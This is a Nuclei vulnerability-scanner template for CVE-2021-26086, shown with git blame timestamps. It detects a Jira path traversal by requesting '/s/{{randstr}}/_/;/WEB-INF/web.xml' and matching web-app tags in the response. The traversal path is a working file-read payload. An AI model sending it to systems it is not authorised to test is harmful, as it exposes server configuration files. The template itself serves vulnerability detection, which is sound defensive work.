nuclei-templates/cves/2021/CVE-2021-26086.yaml

35 lines
905 B
YAML
Raw Normal View History

2021-08-26 03:45:56 +00:00
id: CVE-2021-26086
info:
2021-08-26 09:57:01 +00:00
name: Jira Limited Local File Read
2021-08-26 03:45:56 +00:00
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
2021-08-26 09:57:01 +00:00
reference:
2021-08-26 03:45:56 +00:00
- https://jira.atlassian.com/browse/JRASERVER-72695
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
tags: cve,cve2021,jira,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-26086
cwe-id: CWE-22
2021-08-26 03:45:56 +00:00
requests:
- method: GET
path:
2021-08-26 09:55:05 +00:00
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
2021-08-26 03:45:56 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-08-26 09:55:05 +00:00
2021-08-26 03:45:56 +00:00
- type: word
words:
2021-08-26 09:55:05 +00:00
- "<web-app"
- "</web-app>"
2021-08-26 03:45:56 +00:00
part: body
2021-08-26 09:55:05 +00:00
condition: and